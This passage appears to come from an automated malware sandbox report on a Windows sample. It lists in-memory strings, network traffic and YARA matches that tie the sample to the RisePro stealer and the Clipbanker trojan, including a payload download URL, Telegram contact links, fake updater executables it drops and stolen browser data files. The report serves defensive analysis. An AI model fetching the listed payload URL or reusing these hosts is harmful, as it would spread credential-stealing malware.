            Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4443887762.0000000001682000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016B9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/
            Source: file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/Mozilla/5.0
            Source: file.exe, 00000000.00000002.4442200408.000000000030D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
            Source: file.exe, 00000000.00000002.4443887762.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/t
            Source: file.exe, 00000000.00000002.4443887762.000000000169D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/widget/demo/12.205.151.60
            Source: file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io:443/widget/demo/12.205.151.60
            Source: file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kuljyftgjk.online/
            Source: file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kuljyftgjk.online/Bb
            Source: file.exe, 00000000.00000002.4444160556.00000000016C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kuljyftgjk.online/ons
            Source: file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kuljyftgjk.online/server/k/l2.exe
            Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kuljyftgjk.online/server/k/l2.exe5P#.
            Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kuljyftgjk.online/server/k/l2.exedwzLnNKYB4T0Vnw.exe
            Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kuljyftgjk.online/server/k/l2.exeo
            Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kuljyftgjk.online/server/k/l2.exexefN
            Source: file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kuljyftgjk.online:80/
            Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kuljyftgjk.online:80/I
            Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kuljyftgjk.online:80/Mi&/
            Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kuljyftgjk.online:80/server/k/l2.exe
            Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kuljyftgjk.online:80/server/k/l2.exe5G
            Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kuljyftgjk.online:80/server/k/l2.exeJG
            Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kuljyftgjk.online:80/server/k/l2.exemespace
            Source: file.exe, 00000000.00000003.2199558318.000000000694F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195723746.0000000006946000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196881348.0000000006945000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000007.00000003.2217734150.000000000286A000.00000004.00000020.00020000.00000000.sdmp, llmcrdwzLnNKYB4T0Vnw.exe, 00000009.00000003.2209721688.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.9.dr, EdgeMS2.exe.0.dr, llmcrdwzLnNKYB4T0Vnw.exe.0.drString found in binary or memory: https://sectigo.com/CPS0
            Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://support.mozilla.org
            Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
            Source: file.exe, 00000000.00000002.4445088347.0000000006449000.00000004.00000020.00020000.00000000.sdmp, dZGGvSkztfgYu5jqSY21Wne.zip.0.drString found in binary or memory: https://t.me/RiseProSUPPORT
            Source: file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142639137.0000000006550000.00000004.00000020.00020000.00000000.sdmp, passwords.txt.0.drString found in binary or memory: https://t.me/risepro_bot
            Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_bot%(
            Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/risepro_botisepro_bot
            Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.drString found in binary or memory: https://www.ecosia.org/newtab/
            Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org
            Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
            Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
            Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141059621.0000000006550000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp, Firefox_v6zchhhv.default-release.txt.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
            Source: file.exe, 00000000.00000003.2111465574.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127831309.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2123105572.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124388373.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2121830577.000000000647D000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: file.exe, 00000000.00000003.2111465574.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127831309.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2123105572.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124388373.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2121830577.000000000647D000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
            Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141059621.0000000006550000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp, Firefox_v6zchhhv.default-release.txt.0.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/
            Source: file.exe, 00000000.00000003.2111465574.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127831309.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2123105572.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124388373.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2121830577.000000000647D000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/txt
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownHTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.5:49706 version: TLS 1.2
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D4C230 SetThreadExecutionState,SetThreadExecutionState,CreateThread,CloseHandle,GetDesktopWindow,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,shutdown,closesocket,SetThreadDesktop,Sleep,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,GetCurrentThreadId,GetThreadDesktop,BitBlt,DeleteObject,DeleteDC,ReleaseDC,Sleep,GetSystemMetrics,GetSystemMetrics,GetCurrentThreadId,GetThreadDesktop,SwitchDesktop,SetThreadDesktop,Sleep,Sleep,DeleteObject,DeleteDC,ReleaseDC,
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06D29080 OpenDesktopA,CreateDesktopA,

            System Summary

            Source: 8.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 8.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 7.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 7.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 19.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 19.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 18.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 18.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 17.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 17.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 9.2.llmcrdwzLnNKYB4T0Vnw.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 9.2.llmcrdwzLnNKYB4T0Vnw.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 00000011.00000002.2298062400.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 00000011.00000002.2298062400.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 00000013.00000002.2460266314.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 00000013.00000002.2460266314.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 00000009.00000002.2211800433.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 00000009.00000002.2211800433.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 00000007.00000002.2220685526.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 00000007.00000002.2220685526.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 00000008.00000002.2218340799.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 00000008.00000002.2218340799.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 0000000E.00000002.4441908172.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 0000000E.00000002.4441908172.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: 00000012.00000002.2379291934.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
            Source: 00000012.00000002.2379291934.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
            Source: file.exe | Static PE information: section name: .vmp#+
            Source: file.exe | Static PE information: section name: .vmp#+
            Source: file.exe | Static PE information: section name: .vmp#+
            Source: file.exe | Static PE information: section name: .vmpY[.
            Source: file.exe | Static PE information: section name: .vmpY[.
            Source: C:\Users\user\Desktop\file.exe | Process Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_06D2C480 CreateProcessAsUserA,CloseHandle,CloseHandle,WaitForSingleObject,GetExitCodeProcess,
            Source: Joe Sandbox View | Dropped File: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
            Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
            Source: C:\Users\user\Desktop\file.exe | Code function: String function: 06D66140 appears 58 times
            Source: file.exe, 00000000.00000003.2199558318.000000000694F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
            Source: file.exe, 00000000.00000002.4443680764.0000000001125000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamerangerpromostar_instrument1.exeX8 vs file.exe
            Source: file.exe, 00000000.00000003.2195723746.0000000006946000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
            Source: file.exe, 00000000.00000000.1990364908.0000000001125000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamerangerpromostar_instrument1.exeX8 vs file.exe
            Source: file.exe, 00000000.00000003.2196881348.0000000006945000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
            Source: file.exe | Binary or memory string: OriginalFilenamerangerpromostar_instrument1.exeX8 vs file.exe
            Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 8.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 8.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 7.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 7.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 19.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 19.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 18.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
            Source: 18.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
            Source: 17.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
